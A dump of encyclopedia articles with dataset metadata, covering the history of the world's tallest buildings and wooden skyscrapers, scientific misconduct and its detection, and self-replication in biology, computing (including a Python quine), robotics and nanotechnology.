1973, and consisted of two 110-story towers and several smaller buildings. For a short time the World Trade Center's North Tower, completed in 1972, was the world's tallest building, until surpassed by the Sears Tower in 1973. The towers stood for 28 years, until the September 11 attacks destroyed the buildings in 2001. The Sears Tower (now known as Willis Tower) was completed in 1974. It was the first building to employ the "bundled tube" structural system, designed by Fazlur Khan. It was surpassed in height by the Petronas Towers in 1998, but remained the tallest in some categories until Burj Khalifa surpassed it in all categories in 2010. It is currently the third tallest building in the United States, after One World Trade Center (which was built following 9/11) and Central Park Tower in New York City. Momentum in setting records passed from the United States to other nations with the opening of the Petronas Twin Towers in Kuala Lumpur, Malaysia, in 1998. The record for the world's tallest building has remained in Asia since the opening of Taipei 101 in Taipei, Taiwan, in 2004.
A number of architectural records, including those of the world's tallest building and tallest free-standing structure, moved to the Middle East with the opening of the Burj Khalifa in Dubai, United Arab Emirates. This geographical transition is accompanied by a change in approach to skyscraper design. For much of the 20th century large buildings took the form of simple geometrical shapes, reflecting the "international style" or modernist philosophy shaped by Bauhaus architects early in the century. The last major buildings of this kind, the World Trade Center towers in New York and the Willis Tower in Chicago, erected in the 1970s, reflect that philosophy. Tastes shifted in the decade which followed, and new skyscrapers began to exhibit postmodernist influences. This approach to design avails itself of historical elements, often adapted and re-interpreted, in creating technologically modern structures. The Petronas Twin Towers recall Asian pagoda architecture and Islamic geometric principles. Taipei 101 likewise reflects the pagoda tradition as it incorporates ancient motifs such as the ruyi symbol. The Burj Khalifa draws inspiration from traditional Islamic art. Architects in recent years have sought to create structures that would not appear equally at home if set in any part of the world, but that reflect the culture thriving in the spot where they stand. The list above measures height to the roof, not the pinnacle. The more common gauge is the "highest architectural detail"; such a ranking would have included the Petronas Towers, built in 1996. Gallery Future developments Proposals for kilometre-plus structures have been put forward, including the Burj Mubarak Al Kabir in Kuwait and the Azerbaijan Tower in Baku. Structures of this scale present architectural challenges that may eventually place them in a new architectural category. The first building under construction and planned to be over one kilometre tall is the Jeddah Tower. Wooden skyscrapers Several wooden skyscrapers have been designed and built. A 14-story housing project in Bergen, Norway, known as 'Treet' or 'The Tree', became the world's tallest wooden apartment block when it was completed in late 2015. The Tree's record was eclipsed by Brock Commons, an 18-story wooden dormitory at the University of British Columbia in Canada, when it was completed in September 2016. A 40-story residential building, 'Trätoppen', has been proposed by architect Anders Berensson to be built in Stockholm, Sweden. Trätoppen would be the tallest building in Stockholm, though there are no immediate plans to begin construction. The tallest currently planned wooden skyscraper is the 70-story W350 Project in Tokyo, to be built by the Japanese wood products company Sumitomo Forestry Co. to celebrate its 350th anniversary in 2041. An 80-story wooden skyscraper, the River Beech Tower, has been proposed by a team including architects Perkins + Will and the University of Cambridge. The River Beech Tower, on the banks of the Chicago River in Chicago, Illinois, would be 348 feet shorter than the W350 Project despite having 10 more stories. Wooden skyscrapers are estimated to be around a quarter of the weight of an equivalent reinforced-concrete structure, and to reduce a building's carbon footprint by 60–75%. Buildings have been designed using cross-laminated timber (CLT), which gives higher rigidity and strength to wooden structures. CLT panels are prefabricated and can therefore save on building time.
Technology
Mixed-use buildings
null
29537
https://en.wikipedia.org/wiki/Scientific%20misconduct
Scientific misconduct
Scientific misconduct is the violation of the standard codes of scholarly conduct and ethical behavior in the publication of professional scientific research. It is a violation of scientific integrity: a violation of the scientific method and of research ethics in science, including in the design, conduct, and reporting of research. A Lancet review on the handling of scientific misconduct in Scandinavian countries provides the following sample definitions, reproduced in The COPE report 1999: Danish definition: "Intention or gross negligence leading to fabrication of the scientific message or a false credit or emphasis given to a scientist" Swedish definition: "Intention[al] distortion of the research process by fabrication of data, text, hypothesis, or methods from another researcher's manuscript form or publication; or distortion of the research process in other ways." The consequences of scientific misconduct can be damaging for the perpetrators, for the journal audience, and for any individual who exposes it. In addition, there are public health implications attached to the promotion of medical or other interventions based on false or fabricated research findings. Scientific misconduct can result in loss of public trust in the integrity of science. Three percent of the 3,475 research institutions that report to the US Department of Health and Human Services' Office of Research Integrity indicate some form of scientific misconduct. However, the ORI will only investigate allegations of impropriety where research was funded by federal grants. It routinely monitors such research publications for red flags, and its investigations are subject to a statute of limitations. Other private organizations, like the Committee of Medical Journal Editors (COJE), can only police their own members. Motivation According to David Goodstein of Caltech, there are several motivators for scientists to commit misconduct, which are briefly summarised here. Career pressure Science is still a very strongly career-driven discipline. Scientists depend on a good reputation to receive ongoing support and funding, and a good reputation relies largely on the publication of high-profile scientific papers. Hence, there is a strong imperative to "publish or perish". This may motivate desperate (or fame-hungry) scientists to fabricate results. Ease of fabrication In many scientific fields, results are often difficult to reproduce accurately, being obscured by noise, artifacts, and other extraneous data. That means that even if a scientist does falsify data, they can expect to get away with it, or at least claim innocence if their results conflict with others in the same field. There are few strongly backed systems to investigate possible violations, press charges, or punish deliberate misconduct. It is relatively easy to cheat, although difficult to know exactly how many scientists fabricate data. Monetary gain In many scientific fields, the most lucrative options for professionals are often selling opinions. Corporations can pay experts to support products directly or indirectly via conferences. Psychologists can make money by repeatedly acting as an expert witness in custody proceedings for the same law firms. Forms The U.S. National Science Foundation defines three types of research misconduct: fabrication, falsification, and plagiarism. Fabrication is making up results and recording or reporting them. This is sometimes referred to as "drylabbing".
A minor form of fabrication is the inclusion of references that give arguments the appearance of widespread acceptance but are actually fake, or do not support the argument. Falsification is manipulating research materials, equipment, or processes, or changing or omitting data or results such that the research is not accurately represented in the research record. Plagiarism is the appropriation of another person's ideas, processes, results, or words without giving appropriate credit. One form is the appropriation of the ideas and results of others and their publication in such a way as to make it appear that the author performed all of the work by which the data were obtained. A subset is citation plagiarism – willful or negligent failure to appropriately credit other or prior discoverers, so as to give an improper impression of priority. This is also known as "citation amnesia", the "disregard syndrome" and "bibliographic negligence". Arguably, this is the most common type of scientific misconduct. Sometimes it is difficult to tell whether authors intentionally ignored a highly relevant citation or simply lacked knowledge of the prior work. Discovery credit can also be inadvertently reassigned from the original discoverer to a better-known researcher. This is a special case of the Matthew effect. Plagiarism-fabrication – the act of taking a figure from an unrelated publication and reproducing it exactly in a new publication, claiming that it represents new data. Self-plagiarism – or multiple publication of the same content with different titles or in different journals – is sometimes also considered misconduct; scientific journals explicitly ask authors not to do this. It is referred to as "salami" (i.e. many identical slices) in the jargon of medical journal editors. According to some editors this includes publishing the same article in a different language. Other types of research misconduct are also recognized: Ghostwriting – the phenomenon where someone other than the named author(s) makes a major contribution. Typically, this is done to mask contributions from authors with a conflict of interest. Guest authorship – the phenomenon where authorship is given to someone who has not made any substantial contribution. This can be done by senior researchers who muscle their way onto the papers of inexperienced junior researchers, as well as by others who stack authorship in an effort to guarantee publication. It is much harder to prove due to a lack of consistency in defining "authorship" or "substantial contribution". Scientific misconduct can also occur during the peer-review process by a reviewer or editor with a conflict of interest. Reviewer-coerced citation can also inflate the perceived citation impact of a researcher's work and their reputation in the scientific community, similar to excessive self-citation. Reviewers are expected to be impartial and to assess the quality of the work they review. They are expected to declare a conflict of interest to the editors if they are colleagues or competitors of the authors. A rarer case of scientific misconduct is editorial misconduct, where an editor does not declare conflicts of interest, creates pseudonyms to review papers, issues strongly worded editorial decisions supporting reviews that suggest adding excessive citations to the editor's own unrelated works, or adds themselves as a co-author or their name to the title of the manuscript. Publishing in a predatory journal, knowingly or unknowingly, has also been discussed as a form of potential scientific misconduct.
The peer-review process can have limitations when considering research outside the conventional scientific paradigm: social factors such as "groupthink" can interfere with open and fair deliberation of new research. Sneaked references – the act of subtly embedding references in the metadata of an accepted manuscript that are not present in the manuscript itself, without the original authors being able to notice or correct such modifications. Photo manipulation Compared to other forms of scientific misconduct, image fraud (manipulation of images to distort their meaning) is of particular interest since it can frequently be detected by external parties. In 2006, the Journal of Cell Biology gained publicity for instituting tests to detect photo manipulation in papers that were being considered for publication. This was in response to the increased usage of programs such as Adobe Photoshop by scientists, which facilitate photo manipulation. Since then more publishers, including the Nature Publishing Group, have instituted similar tests and require authors to minimize and specify the extent of photo manipulation when a manuscript is submitted for publication. However, there is little evidence to indicate that such tests are applied rigorously. One Nature paper published in 2009 has subsequently been reported to contain around 20 separate instances of image fraud. Although the type of manipulation that is allowed can depend greatly on the type of experiment presented, and can differ from one journal to another, in general the following manipulations are not allowed: (1) splicing together different images to represent a single experiment; (2) changing the brightness and contrast of only a part of the image; and (3) any change that conceals information, even when it is considered to be non-specific, which includes changing brightness and contrast to leave only the most intense signal, using clone tools to hide information, and showing only a very small part of the photograph so that additional information is not visible. Image manipulations are typically done on visually repetitive images such as those of blots and microscope images. Helicopter research Responsibilities Authorship responsibility All authors of a scientific publication are expected to have made reasonable attempts to check findings submitted to academic journals for publication. Simultaneous submission of scientific findings to more than one journal, or duplicate publication of findings, is usually regarded as misconduct under what is known as the Ingelfinger rule, named after Franz Ingelfinger, the editor of The New England Journal of Medicine from 1967 to 1977. Guest authorship (where there is stated authorship in the absence of involvement, also known as gift authorship) and ghost authorship (where the real author is not listed as an author) are commonly regarded as forms of research misconduct. In some cases coauthors of faked research have been accused of inappropriate behavior or research misconduct for failing to verify reports authored by others or by a commercial sponsor. Examples include the case of Gerald Schatten, who co-authored with Hwang Woo-Suk; the case of Professor Geoffrey Chamberlain, named as guest author of papers fabricated by Malcolm Pearce (Chamberlain was exonerated of collusion in Pearce's deception); and the coauthors of Jan Hendrik Schön at Bell Laboratories. More recent cases include that of Charles Nemeroff, then the editor-in-chief of Neuropsychopharmacology, and a well-documented case involving the drug Actonel.
Authors are expected to keep all study data for later examination even after publication. The failure to keep data may be regarded as misconduct. Some scientific journals require that authors provide information to allow readers to determine whether the authors might have commercial or non-commercial conflicts of interest. Authors are also commonly required to provide information about ethical aspects of research, particularly where research involves human or animal participants or use of biological material. Provision of incorrect information to journals may be regarded as misconduct. Financial pressures on universities have encouraged this type of misconduct. The majority of recent cases of alleged misconduct involving undisclosed conflicts of interest, or failure of the authors to have seen scientific data, involve collaborative research between scientists and biotechnology companies. Research institution responsibility In general, defining whether an individual is guilty of misconduct requires a detailed investigation by the individual's employing academic institution. Such investigations require detailed and rigorous processes and can be extremely costly. Furthermore, the more senior the individual under suspicion, the more likely it is that conflicts of interest will compromise the investigation. In many countries (with the notable exception of the United States) acquisition of funds on the basis of fraudulent data is not a legal offence, and there is consequently no regulator to oversee investigations into alleged research misconduct. Universities therefore have few incentives to investigate allegations in a robust manner, or to act on the findings of such investigations if they vindicate the allegation. Well-publicised cases illustrate the potential role that senior academics in research institutions play in concealing scientific misconduct. A King's College London internal investigation showed research findings from one of their researchers to be 'at best unreliable, and in many cases spurious', but the college took no action, such as retracting relevant published research or preventing further episodes from occurring. In a more recent case, an internal investigation at the National Centre for Cell Science (NCCS), Pune, determined that there was evidence of misconduct by Gopal Kundu, but an external committee was then organised which dismissed the allegation, and the NCCS issued a memorandum exonerating the authors of all charges of misconduct. Undeterred by the NCCS exoneration, the relevant journal (Journal of Biological Chemistry) withdrew the paper based on its own analysis. Scientific peer responsibility Some academics believe that scientific colleagues who suspect scientific misconduct should consider taking informal action themselves, or reporting their concerns. This question is of great importance, since much research suggests that it is very difficult for people to act or come forward when they see unacceptable behavior unless they have help from their organizations. A "User-friendly Guide" and the existence of a confidential organizational ombudsman may help people who are uncertain about what to do, or afraid of bad consequences for speaking up. Responsibility of journals Journals are responsible for safeguarding the research record and hence have a critical role in dealing with suspected misconduct. This is recognised by the Committee on Publication Ethics (COPE), which has issued clear guidelines on the form (e.g.
retraction) that concerns over the research record should take. The COPE guidelines state that journal editors should consider retracting a publication if they have clear evidence that the findings are unreliable, either as a result of misconduct (e.g. data fabrication) or honest error (e.g. miscalculation or experimental error). Retraction is also appropriate in cases of redundant publication, plagiarism and unethical research. Journal editors should consider issuing an expression of concern if: (1) they receive inconclusive evidence of research or publication misconduct by the authors; (2) there is evidence that the findings are unreliable but the authors' institution will not investigate the case; (3) they believe that an investigation into alleged misconduct related to the publication either has not been, or would not be, fair and impartial or conclusive; or (4) an investigation is underway but a judgement will not be available for a considerable time. Journal editors should consider issuing a correction if: (1) a small portion of an otherwise reliable publication proves to be misleading (especially because of honest error); or (2) the author/contributor list is incorrect (i.e. a deserving author has been omitted or somebody who does not meet authorship criteria has been included). Evidence emerged in 2012 that journals learning of cases where there is strong evidence of possible misconduct, with issues potentially affecting a large portion of the findings, frequently fail to issue an expression of concern or correspond with the host institution so that an investigation can be undertaken. In one case, Nature allowed a corrigendum to be published despite clear evidence of image fraud. Subsequent retraction of the paper required the actions of an independent whistleblower. The cases of Joachim Boldt and Yoshitaka Fujii in anaesthesiology focussed attention on the role that journals play in perpetuating scientific fraud as well as how they can deal with it. In the Boldt case, the editors-in-chief of 18 specialist journals (generally anaesthesia and intensive care) made a joint statement regarding 88 published clinical trials conducted without Ethics Committee approval. In the Fujii case, involving nearly 200 papers, the journal Anesthesia & Analgesia, which published 24 of Fujii's papers, has accepted that its handling of the issue was inadequate. Following publication of a letter to the editor from Kranke and colleagues in April 2000, along with a non-specific response from Dr. Fujii, there was no follow-up on the allegation of data manipulation and no request for an institutional review of Dr. Fujii's research. Anesthesia & Analgesia went on to publish 11 additional manuscripts by Dr. Fujii following the 2000 allegations of research fraud, with Editor Steven Shafer stating in March 2012 that subsequent submissions to the Journal by Dr. Fujii should not have been published without first vetting the allegations of fraud. In April 2012 Shafer led a group of editors to write a joint statement, in the form of an ultimatum made available to the public, to a large number of academic institutions where Fujii had been employed, offering these institutions the chance to attest to the integrity of the bulk of the allegedly fraudulent papers. Consequences of scientific misconduct Consequences for science The consequences of scientific fraud vary based on the severity of the fraud, the level of notice it receives, and how long it goes undetected.
For cases of fabricated evidence, the consequences can be wide-ranging, with others working to confirm (or refute) the false finding, or with research agendas being distorted to address the fraudulent evidence. The Piltdown Man fraud is a case in point: the significance of the bona-fide fossils that were being found was muted for decades because they disagreed with Piltdown Man and the preconceived notions that those faked fossils supported. In addition, the prominent paleontologist Arthur Smith Woodward spent time at Piltdown each year until he died, trying to find more Piltdown Man remains. The misdirection of resources kept others from taking the real fossils more seriously and delayed the reaching of a correct understanding of human evolution. (The Taung Child, which should have been the death knell for the view that the human brain evolved first, was instead treated very critically because of its disagreement with the Piltdown Man evidence.) In the case of Prof Don Poldermans, the misconduct occurred in reports of trials of treatment to prevent death and myocardial infarction in patients undergoing operations. The trial reports were relied upon to issue guidelines that applied for many years across North America and Europe. In the case of Dr Alfred Steinschneider, two decades and tens of millions of research dollars were lost trying to find the elusive link between infant sleep apnea, which Steinschneider said he had observed and recorded in his laboratory, and sudden infant death syndrome (SIDS), of which he stated it was a precursor. The cover was blown in 1994, 22 years after Steinschneider's 1972 Pediatrics paper claiming such an association, when Waneta Hoyt, the mother of the patients in the paper, was arrested, indicted and convicted on five counts of second-degree murder for the smothering deaths of her five children. While that in itself was bad enough, the paper, presumably written as an attempt to save infants' lives, was ironically ultimately used as a defense by parents suspected in multiple deaths of their own children in cases of Münchausen syndrome by proxy. The 1972 Pediatrics paper was cited in 404 papers in the interim and is still listed on PubMed without comment. Consequences for those who expose misconduct The potentially severe consequences for individuals who are found to have engaged in misconduct also reflect on the institutions that host or employ them, and on the participants in any peer review process that has allowed the publication of questionable research. This means that a range of actors in any case may have a motivation to suppress any evidence or suggestion of misconduct. Persons who expose such cases, commonly called whistleblowers, find themselves open to retaliation by a number of different means. These negative consequences for exposers of misconduct have driven the development of whistle-blower charters, designed to protect those who raise concerns (for more details refer to retaliation (law)). Regulatory violations and consequences (example) Title 10, Code of Federal Regulations (CFR), Part 50.5, Deliberate Misconduct, of the U.S. Nuclear Regulatory Commission (NRC) regulations addresses the prohibition of certain activities by individuals involved in NRC-licensed activities. 10 CFR 50.5 is designed to ensure the safety and integrity of nuclear operations. 10 CFR Part 50.9, Completeness and Accuracy of Information, focuses on the requirements for providing information and data to the NRC.
The intent of 10 CFR 50.5 is to deter and penalize intentional wrongdoing (i.e., violations). 10 CFR 50.9 is crucial in maintaining transparency and reliability in the nuclear industry; it effectively emphasizes honesty and integrity in maintaining the safety and security of nuclear operations. Providing false or misleading information or data to the NRC is therefore a violation of 10 CFR 50.9. Violation of any of these rules can lead to severe penalties, including termination, fines and criminal prosecution. It can also result in the revocation of licenses or certifications, thereby barring individuals or entities from participating in any NRC-licensed activities in the future. Data issues Exposure of fraudulent data With the advancement of the internet, there are now several tools available to aid in the detection of plagiarism and multiple publication within biomedical literature. One tool, developed in 2006 by researchers in Dr. Harold Garner's laboratory at the University of Texas Southwestern Medical Center at Dallas, is Déjà vu, an open-access database containing several thousand instances of duplicate publication. All of the entries in the database were discovered through the use of the text data mining algorithm eTBLAST, also created in Dr. Garner's laboratory. The creation of Déjà vu and the subsequent classification of several hundred articles contained therein have ignited much discussion in the scientific community concerning issues such as ethical behavior, journal standards, and intellectual copyright. Studies on this database have been published in journals such as Nature and Science, among others. Other tools which may be used to detect fraudulent data include error analysis. Measurements generally have a small amount of error, and repeated measurements of the same item will generally result in slight differences in readings. These differences can be analyzed, and they follow certain known mathematical and statistical properties. Should a set of data appear to be too faithful to the hypothesis (i.e., the amount of error that would normally be in such measurements does not appear), a conclusion can be drawn that the data may have been forged. Error analysis alone is typically not sufficient to prove that data have been falsified or fabricated, but it may provide the supporting evidence necessary to confirm suspicions of misconduct.
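One way to formalise "too faithful to the hypothesis" is a reduced chi-squared check: if repeated measurements scatter far less than the instrument's known error would produce, the statistic falls well below 1, which is itself suspicious. A minimal sketch in Python; the function name, threshold, and data are illustrative, and a real test would use proper degrees of freedom and a formal significance level:

def too_faithful(measurements, expected, sigma, threshold=0.1):
    # Reduced chi-squared of the residuals, using n as the degrees of
    # freedom for simplicity. Values far below 1 mean the points hug the
    # expected value more tightly than the known error sigma allows.
    chi2 = sum(((m - expected) / sigma) ** 2 for m in measurements)
    reduced = chi2 / len(measurements)
    return reduced < threshold, reduced

# Ten readings that all sit within 0.01 of the hypothesised value 10.0,
# although the instrument is only good to sigma = 0.5: flagged as suspicious.
data = [9.99, 10.01, 10.00, 9.99, 10.01, 10.00, 10.00, 9.99, 10.01, 10.00]
print(too_faithful(data, expected=10.0, sigma=0.5))

As the surrounding text notes, such a flag is supporting evidence for an inquiry, not proof of fabrication on its own.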
Data sharing Kirby Lee and Lisa Bero suggest, "Although reviewing raw data can be difficult, time-consuming and expensive, having such a policy would hold authors more accountable for the accuracy of their data and potentially reduce scientific fraud or misconduct." Underreporting The vast majority of cases of scientific misconduct may go unreported. The number of article retractions in 2022 was nearly 5,500, but Ivan Oransky and Adam Marcus, co-founders of Retraction Watch, estimate that at least 100,000 retractions should occur every year, with only about one in five being due to "honest error". Some notable cases In 1998 Andrew Wakefield published a fraudulent research paper in The Lancet claiming links between the MMR vaccine, autism, and inflammatory bowel disease. In 2010, he was found guilty of dishonesty in his research and banned from medicine by the UK General Medical Council following an investigation by Brian Deer of the London Sunday Times. The claims in Wakefield's paper were widely reported, leading to a sharp drop in vaccination rates in the UK and Ireland and outbreaks of mumps and measles. Promotion of the claimed link continues to fuel the anti-vaccination movement. In 2011 Diederik Stapel, a highly regarded Dutch social psychologist, was discovered to have fabricated data in dozens of studies on human behaviour. He has been called "the biggest con man in academic science". In 2020, Sapan Desai and his coauthors published two papers in the prestigious medical journals The Lancet and The New England Journal of Medicine, early in the COVID-19 pandemic. The papers were based on a very large dataset published by Surgisphere, a company owned by Desai. The dataset was exposed as a fabrication, and the papers were soon retracted. In 2024, Eliezer Masliah, head of the Division of Neuroscience at the National Institute on Aging, was suspected of having manipulated and inappropriately reused images in over 100 scientific papers spanning several decades, including those that were used by the FDA to greenlight testing of the experimental drug prasinezumab as a treatment for Parkinson's. Solutions Changing research assessment Since 2012, the Declaration on Research Assessment (DORA), launched in San Francisco, has gathered many institutions, publishers, and individuals committed to improving the metrics used to assess research and to moving away from a focus on the journal impact factor.
Physical sciences
Science basics
Basics and measurement
29549
https://en.wikipedia.org/wiki/Self-replication
Self-replication
Self-replication is any behavior of a dynamical system that yields construction of an identical or similar copy of itself. Biological cells, given suitable environments, reproduce by cell division. During cell division, DNA is replicated and can be transmitted to offspring during reproduction. Biological viruses can replicate, but only by commandeering the reproductive machinery of cells through a process of infection. Harmful prion proteins can replicate by converting normal proteins into rogue forms. Computer viruses reproduce using the hardware and software already present on computers. Self-replication in robotics has been an area of research and a subject of interest in science fiction. Any self-replicating mechanism which does not make a perfect copy (mutation) will experience genetic variation and will create variants of itself. These variants will be subject to natural selection, since some will be better at surviving in their current environment than others and will out-breed them. Overview Theory Early research by John von Neumann established that replicators have several parts: (1) a coded representation of the replicator; (2) a mechanism to copy the coded representation; and (3) a mechanism for effecting construction within the host environment of the replicator. Exceptions to this pattern may be possible, although almost all known examples adhere to it. Scientists have come close to constructing RNA that can be copied in an "environment" that is a solution of RNA monomers and transcriptase, but such systems are more accurately characterized as "assisted replication" than "self-replication". In 2021 researchers succeeded in constructing a system of sixteen specially designed DNA sequences. Four of these can be linked together (through base pairing) in a certain order, following a template of four already-linked sequences, by cycling the temperature up and down. The number of template copies is thus increased in each cycle. No external agent such as an enzyme is needed, but the system must be supplied with a reservoir of the sixteen DNA sequences. The simplest possible case is that only a genome exists. Without some specification of the self-reproducing steps, a genome-only system is probably better characterized as something like a crystal. Origin of life Self-replication is a fundamental feature of life. It has been proposed that self-replication emerged in the evolution of life when a molecule similar to a double-stranded polynucleotide (possibly like RNA) dissociated into single-stranded polynucleotides, each of which acted as a template for synthesis of a complementary strand, producing two double-stranded copies. In a system such as this, individual duplex replicators with different nucleotide sequences could compete with each other for available mononucleotide resources, thus initiating natural selection for the most "fit" sequences. Replication of these early forms of life was likely highly inaccurate, producing mutations that influenced the folding state of the polynucleotides and thus affected the propensities for strand association (promoting stability) and dissociation (allowing genome replication). The evolution of order in living systems has been proposed to be an example of a fundamental order-generating principle that also applies to physical systems. Classes of self-replication Recent research has begun to categorize replicators, often based on the amount of support they require. Natural replicators have all or most of their design from nonhuman sources.
Such systems include natural life forms. Autotrophic replicators can reproduce themselves "in the wild". They mine their own materials. It is conjectured that non-biological autotrophic replicators could be designed by humans, and could easily accept specifications for human products. Self-reproductive systems are conjectured systems which would produce copies of themselves from industrial feedstocks such as metal bar and wire. Self-assembling systems assemble copies of themselves from finished, delivered parts. Simple examples of such systems have been demonstrated at the macro scale. The design space for machine replicators is very broad. The most comprehensive study to date, by Robert Freitas and Ralph Merkle, has identified 137 design dimensions grouped into a dozen separate categories, including: (1) Replication Control, (2) Replication Information, (3) Replication Substrate, (4) Replicator Structure, (5) Passive Parts, (6) Active Subunits, (7) Replicator Energetics, (8) Replicator Kinematics, (9) Replication Process, (10) Replicator Performance, (11) Product Structure, and (12) Evolvability. A self-replicating computer program In computer science a quine is a self-reproducing computer program that, when executed, outputs its own code. For example, a well-known quine in the Python programming language is:
s='s=%r;print(s%%s)';print(s%s)
Running it prints exactly the one-line source above. A more trivial approach is to write a program that will make a copy of any stream of data that it is directed to, and then direct it at itself (see the sketch below). In this case the program is treated both as executable code and as data to be manipulated. This approach is common in most self-replicating systems, including biological life, and is simpler as it does not require the program to contain a complete description of itself. In many programming languages an empty program is legal, and executes without producing errors or other output. The output is thus the same as the source code, so the program is trivially self-reproducing.
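The "more trivial approach" just described can be illustrated with a short Python sketch. It assumes the program is run from a file, so that Python's __file__ points at its own source:

# A "trivial" self-reproducing program: it treats its own source file
# as a data stream and copies that stream, unchanged, to standard output.
with open(__file__) as source:
    print(source.read(), end="")

Unlike a true quine, this program does not contain a description of itself; it relies on the environment (the file system) to supply one, much as a virus relies on a host cell.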
Self-replicating tiling In geometry a self-replicating tiling is a tiling pattern in which several congruent tiles may be joined together to form a larger tile that is similar to the original. This is an aspect of the field of study known as tessellation. The "sphinx" hexiamond is the only known self-replicating pentagon. For example, four such concave pentagons can be joined together to make one with twice the dimensions. Solomon W. Golomb coined the term rep-tiles for self-replicating tilings. In 2012, Lee Sallows identified rep-tiles as a special instance of a self-tiling tile set, or setiset. A setiset of order n is a set of n shapes that can be assembled in n different ways so as to form larger replicas of themselves. Setisets in which every shape is distinct are called 'perfect'. A rep-n rep-tile is just a setiset composed of n identical pieces. Self-replicating clay crystals One form of natural self-replication that is not based on DNA or RNA occurs in clay crystals. Clay consists of a large number of small crystals, and clay is an environment that promotes crystal growth. Crystals consist of a regular lattice of atoms and are able to grow if, for example, placed in a water solution containing the crystal components, automatically arranging atoms at the crystal boundary into the crystalline form. Crystals may have irregularities where the regular atomic structure is broken, and when crystals grow, these irregularities may propagate, creating a form of self-replication of crystal irregularities. Because these irregularities may affect the probability of a crystal breaking apart to form new crystals, crystals with such irregularities could even be considered to undergo evolutionary development. Applications It is a long-term goal of some engineering sciences to achieve a clanking replicator, a material device that can self-replicate. The usual reason is to achieve a low cost per item while retaining the utility of a manufactured good. Many authorities say that in the limit, the cost of self-replicating items should approach the cost-per-weight of wood or other biological substances, because self-replication avoids the costs of labor, capital and distribution in conventional manufactured goods. A fully novel artificial replicator is a reasonable near-term goal. A NASA study placed the complexity of a clanking replicator at approximately that of Intel's Pentium 4 CPU; that is, the technology is achievable by a relatively small engineering group, in a reasonable commercial time-scale, at a reasonable cost. Given the currently keen interest in biotechnology and the high levels of funding in that field, attempts to exploit the replicative ability of existing cells are timely, and may easily lead to significant insights and advances. A variation of self-replication is of practical relevance in compiler construction, where a bootstrapping problem occurs similar to that in natural self-replication. A compiler (phenotype) can be applied to the compiler's own source code (genotype), producing the compiler itself. During compiler development, a modified (mutated) source is used to create the next generation of the compiler. This process differs from natural self-replication in that it is directed by an engineer, not by the subject itself. Mechanical self-replication An active area of robotics research is the self-replication of machines. Since all robots (at least in modern times) share a fair number of the same features, a self-replicating robot (or possibly a hive of robots) would need to do the following: (1) obtain construction materials; (2) manufacture new parts, including its smallest parts and thinking apparatus; (3) provide a consistent power source; (4) program the new members; and (5) error-correct any mistakes in the offspring. On a nano scale, assemblers might also be designed to self-replicate under their own power. This, in turn, has given rise to the "grey goo" version of Armageddon, as featured in the science fiction novels Bloom and Prey. The Foresight Institute has published guidelines for researchers in mechanical self-replication. The guidelines recommend that researchers use several specific techniques for preventing mechanical replicators from getting out of control, such as using a broadcast architecture. Fields Research has occurred in the following areas: Biology: studies of organismal and cellular natural replication and replicators, and their interaction, including sub-disciplines such as population dynamics, quorum sensing, and autophagy pathways. These can be an important guide to avoiding design difficulties in self-replicating machinery. Chemistry: self-replication studies are typically about how a specific set of molecules can act together to replicate each other within the set (often part of the systems chemistry field). Biochemistry: simple systems of in vitro ribosomal self-replication have been attempted, but as of January 2021, indefinite in vitro ribosomal self-replication had not been achieved in the lab.
Nanotechnology, or more precisely molecular nanotechnology, is concerned with making nano-scale assemblers. Without self-replication, capital and assembly costs of molecular machines become impossibly large. Many bottom-up approaches to nanotechnology take advantage of biochemical or chemical self-assembly. Space resources: NASA has sponsored a number of design studies to develop self-replicating mechanisms to mine space resources. Most of these designs include computer-controlled machinery that copies itself. Memetics: the idea of a meme was coined by Richard Dawkins in his 1976 book The Selfish Gene, where he proposed a cognitive equivalent of the gene: a unit of behavior which is copied from one host mind to another through observation. Memes can only propagate via animal behavior and are thus analogous to information viruses and are often described as viral. Computer security: many computer security problems are caused by self-reproducing computer programs that infect computers, namely computer worms and computer viruses. Parallel computing: loading a new program on every node of a large computer cluster or distributed computing system is time-consuming. Using mobile agents to self-replicate code from node to node can save the system administrator a lot of time. Mobile agents have the potential to crash a computer cluster if poorly implemented. In industry Space exploration and manufacturing The goal of self-replication in space systems is to exploit large amounts of matter with a low launch mass. For example, an autotrophic self-replicating machine could cover a moon or planet with solar cells, and beam the power to the Earth using microwaves. Once in place, the same machinery that built itself could also produce raw materials or manufactured objects, including transportation systems to ship the products. Another model of self-replicating machine would copy itself through the galaxy and universe, sending information back. In general, since these systems are autotrophic, they are the most difficult and complex known replicators. They are also thought to be the most hazardous, because they do not require any inputs from human beings in order to reproduce. A classic theoretical study of replicators in space is the 1980 NASA study of autotrophic clanking replicators, edited by Robert Freitas. Much of the design study was concerned with a simple, flexible chemical system for processing lunar regolith, and with the differences between the ratio of elements needed by the replicator and the ratios available in regolith. The limiting element was chlorine, which is essential for processing regolith into aluminium. Chlorine is very rare in lunar regolith, and a substantially faster rate of reproduction could be assured by importing modest amounts. The reference design specified small computer-controlled electric carts running on rails. Each cart could have a simple hand or a small bulldozer shovel, forming a basic robot. Power would be provided by a "canopy" of solar cells supported on pillars. The other machinery could run under the canopy. A "casting robot" would use a robotic arm with a few sculpting tools to make plaster molds. Plaster molds are easy to make, and produce precise parts with good surface finishes. The robot would then cast most of the parts, either from non-conductive molten rock (basalt) or from purified metals. An electric oven would melt the materials.
A speculative, more complex "chip factory" was specified to produce the computer and electronic systems, but the designers also said that it might prove practical to ship the chips from Earth as if they were "vitamins". Molecular manufacturing Nanotechnologists in particular believe that their work will likely fail to reach a state of maturity until human beings design a self-replicating assembler of nanometer dimensions. These systems are substantially simpler than autotrophic systems, because they are provided with purified feedstocks and energy, which they do not have to produce for themselves. This distinction is at the root of some of the controversy about whether molecular manufacturing is possible or not. Many authorities who find it impossible are clearly citing sources on complex autotrophic self-replicating systems. Many of the authorities who find it possible are clearly citing sources on much simpler self-assembling systems, which have been demonstrated. In the meantime, a Lego-built autonomous robot able to follow a pre-set track and assemble an exact copy of itself, starting from four externally provided components, was demonstrated experimentally in 2003. Merely exploiting the replicative abilities of existing cells is insufficient, because of limitations in the process of protein biosynthesis. What is required is the rational design of an entirely novel replicator with a much wider range of synthesis capabilities. In 2011, New York University scientists developed artificial structures that can self-replicate, a process that has the potential to yield new types of materials. They demonstrated that it is possible to replicate not just molecules like cellular DNA or RNA, but discrete structures that could in principle assume many different shapes, have many different functional features, and be associated with many different types of chemical species.
Physical sciences
Science basics
Basics and measurement
29559
https://en.wikipedia.org/wiki/Sienna
Sienna
